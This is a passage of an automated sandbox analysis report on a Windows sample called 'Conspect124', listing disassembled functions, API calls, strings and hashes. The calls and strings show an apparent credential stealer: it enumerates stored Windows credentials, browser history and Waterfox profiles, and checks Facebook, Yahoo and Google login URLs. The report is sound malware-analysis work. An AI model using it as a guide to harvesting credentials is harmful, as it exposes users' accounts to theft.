                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                      • String ID: bhv
                                      • API String ID: 4234240956-2689659898
                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                      Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2941347001-70141382
                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • wcschr.MSVCRT ref: 0040C324
                                      • wcschr.MSVCRT ref: 0040C344
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • GetLastError.KERNEL32 ref: 0040C373
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                      • String ID: visited:
                                      • API String ID: 2470578098-1702587658
                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 free 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • free.MSVCRT ref: 0040E28B
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                      • _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                      • API String ID: 2804212203-2982631422
                                      • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                      • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040BC75
                                      • memset.MSVCRT ref: 0040BC8C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 115830560-3916222277
                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                      Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError free 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 794 418506-418515 free 787->794 788->787 794->772
                                      APIs
                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                      • GetLastError.KERNEL32 ref: 0041847E
                                      • free.MSVCRT ref: 0041848B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile$ErrorLastfree
                                      • String ID: |A
                                      • API String ID: 77810686-1717621600
                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0041249C
                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                      • wcscpy.MSVCRT ref: 004125A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                      • String ID: r!A
                                      • API String ID: 2791114272-628097481
                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                      • wcslen.MSVCRT ref: 0040C82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                      • API String ID: 2936932814-4196376884
                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                      Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040A824
                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                      • wcscpy.MSVCRT ref: 0040A854
                                      • wcscat.MSVCRT ref: 0040A86A
                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: C:\Windows\system32
                                      • API String ID: 669240632-2896066436
                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                      Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • wcslen.MSVCRT ref: 0040BE06
                                      • wcsncmp.MSVCRT ref: 0040BE38
                                      • memset.MSVCRT ref: 0040BE91
                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                      • wcschr.MSVCRT ref: 0040BF24
                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                      • String ID:
                                      • API String ID: 697348961-0
                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403CBF
                                      • memset.MSVCRT ref: 00403CD4
                                      • memset.MSVCRT ref: 00403CE9
                                      • memset.MSVCRT ref: 00403CFE
                                      • memset.MSVCRT ref: 00403D13
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403DDA
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Waterfox$Waterfox\Profiles
                                      • API String ID: 4039892925-11920434
                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403E50
                                      • memset.MSVCRT ref: 00403E65
                                      • memset.MSVCRT ref: 00403E7A
                                      • memset.MSVCRT ref: 00403E8F
                                      • memset.MSVCRT ref: 00403EA4
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403F6B
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
